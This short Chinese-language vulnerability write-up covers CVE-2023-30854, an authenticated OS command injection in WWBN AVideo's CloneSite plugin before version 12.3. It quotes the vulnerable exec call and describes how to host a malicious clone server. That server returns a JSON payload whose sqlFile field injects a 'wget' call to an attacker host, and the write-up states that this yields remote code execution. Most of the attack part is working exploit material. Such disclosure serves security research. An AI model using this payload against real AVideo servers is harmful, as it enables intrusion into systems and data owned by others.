CVE-2023-30854 WWBN Avideo < 12.3 认证 RCE
在认证端点 /plugin/CloneSite/cloneClient.json.php 中存在一个操作系统命令注入漏洞,允许攻击者实现远程代码执行。
漏洞代码:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
我们可以通过管理面板的克隆站点功能控制 $objClone->cloneSiteURL。
/plugin/CloneSite/cloneClient.json.php 向 {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php 发送 GET 请求。我托管了一个特制的 cloneServer.json.php,它输出以下 JSON 数据
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}
向 /plugin/CloneSite/cloneClient.json.php 发送 GET 请求即可实现远程代码执行。
